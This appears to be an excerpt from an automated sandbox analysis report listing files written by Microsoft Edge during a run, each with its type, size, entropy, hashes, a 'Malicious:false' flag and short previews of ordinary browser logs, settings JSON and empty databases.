                                                                                                                                                                                                                                                                SSDEEP:6:7Agt+q2PCHhJ23oH+Tcwt865IFUt8OAsLZmw+OAhVkwOCHhJ23oH+Tcwt86+ULJ:7SvBYeb/WFUt8OBL/+Oq56Yeb/+SJ
                                                                                                                                                                                                                                                                MD5:424AEFFE3B83ABF97069A702E793F36D
                                                                                                                                                                                                                                                                SHA1:0F9778586E2E67622355F9953637A30EADDAE692
                                                                                                                                                                                                                                                                SHA-256:6CB9C25BC9E6D69A9D6FAAA06D7FCE8871423676F61D24A6FC468BF4C381184C
                                                                                                                                                                                                                                                                SHA-512:2B391E65D528072616853227970A06F568A6582BA4F19CE65044B8BB26D965C5F2167C123519F190B1CA7FAC728E026B12EED111C5AD7B9B59D8E801E2746A76
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:09.559 1b48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/16-07:47:09.562 1b48 Recovering log #3.2024/12/16-07:47:09.563 1b48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1254
                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):324
                                                                                                                                                                                                                                                                Entropy (8bit):5.24347694310553
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7A143+q2PCHhJ23oH+Tcwt8NIFUt8OA1UsZmw+OA1UsVkwOCHhJ23oH+Tcwt8+ed:7Y43+vBYebpFUt8OYr/+OY7V56YebqJ
                                                                                                                                                                                                                                                                MD5:4120F6B1F938F6C92E790CE07F6BE2F5
                                                                                                                                                                                                                                                                SHA1:3AAFF30D37A3B2F1B409BFB55B6BDCBBB2CD4B3C
                                                                                                                                                                                                                                                                SHA-256:92675BDDC784BEF4D46A0338296F6895501C1E79FD98D72ADD693514D48D78C7
                                                                                                                                                                                                                                                                SHA-512:283D66C559A6B889DFA3E1DB2A82915F3B62E4626098C6090F6FE8F15BF4C018EFC2A9A59D52EBCAB11D0C5B54B64A982E166E7DEB52F7DCBDEDF781B4B218F3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:10.358 144c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/16-07:47:10.359 144c Recovering log #3.2024/12/16-07:47:10.359 144c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):429
                                                                                                                                                                                                                                                                Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                                                Entropy (8bit):3.647817067438668
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:aj9P0ycAjlrP/KbtpQkQerE773pLIRKToaA9gam6Iqhf:adgKlrP/se2E7WRKcca9
                                                                                                                                                                                                                                                                MD5:DA969EAC251439FB894D2E594F461474
                                                                                                                                                                                                                                                                SHA1:10F100DB402C0D538055E53D0F5D9B7CD96B4987
                                                                                                                                                                                                                                                                SHA-256:2AE678AA375598BF146EF9F558A649B3DF47476AAC704D657C20E49063A16BC6
                                                                                                                                                                                                                                                                SHA-512:A993264D4F1F049ACCA55EFB89CBD0FBC94F6A8EBAA39B3430407127FEBD8FEEB108DDEE791F274F3BB8746CA05B3D016A4ADE8CBE9D6EB519628451AB5F3E64
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):408
                                                                                                                                                                                                                                                                Entropy (8bit):5.339393266633813
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:7UbNvBYeb8rcHEZrELFUt8OUP/+OUd56Yeb8rcHEZrEZSJ:7UbRBYeb8nZrExg8OUzUP6Yeb8nZrEZe
                                                                                                                                                                                                                                                                MD5:3BCAF37F474CA7D906601CBDC27781C9
                                                                                                                                                                                                                                                                SHA1:7BF55092AC521590FB745714310FB245E1F085FD
                                                                                                                                                                                                                                                                SHA-256:2F51840AF03B58DEF96FDE3E3062338E9DDAFA9A32EA82CED514E098357E12D3
                                                                                                                                                                                                                                                                SHA-512:A5A342E80671122B0025AE623F9305BED837863CC0CE0A82C8192859EF9CA2EE0F2B21CF4D663D6CE9C50205E9E31D58F9F683800C5D7BB56C8F6116348031E6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:13.464 1b48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/16-07:47:13.465 1b48 Recovering log #3.2024/12/16-07:47:13.465 1b48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1153
                                                                                                                                                                                                                                                                Entropy (8bit):5.599430551723923
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:9ZWTmEUlHhe2lw0g5bhg2seiXZiHW33yV03y1x4/inMyG:9ZxEcecw1/bsbXZi2HyV03Sx4/iMyG
                                                                                                                                                                                                                                                                MD5:37AF3C5CEEC2FB69C012725119917337
                                                                                                                                                                                                                                                                SHA1:AE1E15A4B6759E2426719F1E4B78D940E688D472
                                                                                                                                                                                                                                                                SHA-256:63C65F179B0899DBD392F9A42D76B3F8FD8779A5F08190129CDC7E249AF280DA
                                                                                                                                                                                                                                                                SHA-512:CA7E3582F966274BC11B0F1E8697BAAF87A4D610F607AE6947DBBFE54B571D5AF3A5DD9813AF056042DCC5294B1BD3F379C2CD199EAEEA209EDBD1DCBA4CF621
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:...Nz................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":782}.!_https://ntp.msn.com..LastKnownPV..1734353246536.-_https://ntp.msn.com..LastVisuallyReadyMarker..1734353247664.._https://ntp.msn.com..MUID!.162DEC371C56639E2ED8F9601DDC6260.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1734353246623,"schedule":[-1,-1,37,4,-1,-1,16],"scheduleFixed":[-1,-1,37,4,-1,-1,16],"simpleSchedule":[18,17,48,40,11,50,44]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1734353246497.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241213.442"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):333
                                                                                                                                                                                                                                                                Entropy (8bit):5.196323856049425
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7AFyq2PCHhJ23oH+Tcwt8a2jMGIFUt8OAUvk11Zmw+OAUVc9RkwOCHhJ23oH+TcL:7syvBYeb8EFUt8OXkX/+O6R56Yeb8bJ
                                                                                                                                                                                                                                                                MD5:93C9EA3EA9367C66CBC06621E4170616
                                                                                                                                                                                                                                                                SHA1:2869C37317D93DC99084AEE8AC830704E8244134
                                                                                                                                                                                                                                                                SHA-256:DAA7D089F88481757C7F28BBB463D393FBD94E51C5B6AF669873D2A40CA9FAFC
                                                                                                                                                                                                                                                                SHA-512:4170E5D6B3215F8D93F91CDBD056099FDAF7A618386549211C802A46D9D58BEC7E2E2B29A566845FF76EC1927A48BCC217AE85C90CDA1BA153F1969B71859CBD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:09.879 fe0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/16-07:47:09.880 fe0 Recovering log #3.2024/12/16-07:47:09.882 fe0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1452
                                                                                                                                                                                                                                                                Entropy (8bit):5.293818359480967
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:YcCp/WRdsZZVMdmwC5mWRdsHPyZFRudFGRRds9JZFGJ/I3w6C1E6maPsQYhbS7n7:YcCpWsPuCvs+fcKsFgCgakhYhbc
                                                                                                                                                                                                                                                                MD5:B0733CD56C6DAEC03253582405A3C607
                                                                                                                                                                                                                                                                SHA1:EBFFEB5D568DFC774355F3329BB1DD69A06D9D17
                                                                                                                                                                                                                                                                SHA-256:BB4556F6A892CD298278B5D16EB81F2B815018687B11F789213CE95806E5A11C
                                                                                                                                                                                                                                                                SHA-512:F6F90123E0314680B23966126634511E879E761A8094AB17BD3B0F3D58F09DEB8780519C56F319B4C3FB723FE3148453E6B4A14338D052F3518D809761FD2344
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343559442531603","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343559443198826","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343559451800699","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                Entropy (8bit):2.7765670339334374
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:tT5yl1bIIemkqBNFixnTFXc3T6Xcf0L/ZJVb:V5q1cIrkqBLitTSj6XI0LhJVb
                                                                                                                                                                                                                                                                MD5:279638263B6F948B5BA870D223F09E62
                                                                                                                                                                                                                                                                SHA1:87B380D27ADCEF23A271E291616F53EC907251A0
                                                                                                                                                                                                                                                                SHA-256:7A01E06FAE04F3AECEC0AB7232FBD96EEE001CBB0C1010A083041DE845DB645B
                                                                                                                                                                                                                                                                SHA-512:23B5C2DF1FD1FDB791C43BCA621DAC94042BF4CF60F29DC71E36A6C3F5D0B5CC62853E2D6C87A35FD2EA5AEE942FC9C5232818851587F0C8619FA4FC08886A2E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1452
                                                                                                                                                                                                                                                                Entropy (8bit):5.293818359480967
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:YcCp/WRdsZZVMdmwC5mWRdsHPyZFRudFGRRds9JZFGJ/I3w6C1E6maPsQYhbS7n7:YcCpWsPuCvs+fcKsFgCgakhYhbc
                                                                                                                                                                                                                                                                MD5:B0733CD56C6DAEC03253582405A3C607
                                                                                                                                                                                                                                                                SHA1:EBFFEB5D568DFC774355F3329BB1DD69A06D9D17
                                                                                                                                                                                                                                                                SHA-256:BB4556F6A892CD298278B5D16EB81F2B815018687B11F789213CE95806E5A11C
                                                                                                                                                                                                                                                                SHA-512:F6F90123E0314680B23966126634511E879E761A8094AB17BD3B0F3D58F09DEB8780519C56F319B4C3FB723FE3148453E6B4A14338D052F3518D809761FD2344
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                Entropy (8bit):1.2802394859211257
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBobB:uIEumQv8m1ccnvS6Csmdkii2mz1a
                                                                                                                                                                                                                                                                MD5:E920FD56239A3EEDF24BB84B6F4B2E43
                                                                                                                                                                                                                                                                SHA1:A11684880DD140E88CA611D3E5B66B7A281E4672
                                                                                                                                                                                                                                                                SHA-256:BD8CE70EE243D239FC529FA73CC41A802ED26DC97F7A4B88A3D6604D378CC6BA
                                                                                                                                                                                                                                                                SHA-512:16B2E6A59BE8C46ADA88EF129870C286A454AEC7B435923047C0D6307E818A677BE2DDD8AD16C27B1AFAACB6C4E4A4A8AC8855E120B7C17246AB94F979C718C2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9499
                                                                                                                                                                                                                                                                Entropy (8bit):5.11305086439715
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:st5kdpCs4ZIa34Hk+8EX8tbV+FW3QA4Jq7NIOPNYJ:st5QCs4ZX1/bGCQx07NIl
                                                                                                                                                                                                                                                                MD5:FF8C0A97C32B79A36C19405A7777981B
                                                                                                                                                                                                                                                                SHA1:8E5804FA0600F6656891B1AC73F25615620C884F
                                                                                                                                                                                                                                                                SHA-256:3DC64149203FE087B93E2BBA60672C47DA216D88FB9C39F361A2960E63581D06
                                                                                                                                                                                                                                                                SHA-512:52DF329A16692596ED9B66DE1917B60BCD3956328B3FC022AAEF54452445041D2CDF1C1D2084CB2CC2AD16F0DEFC016CB7AC48413F3BBD77690E57ED834AE005
                                                                                                                                                                                                                                                                Malicious:false
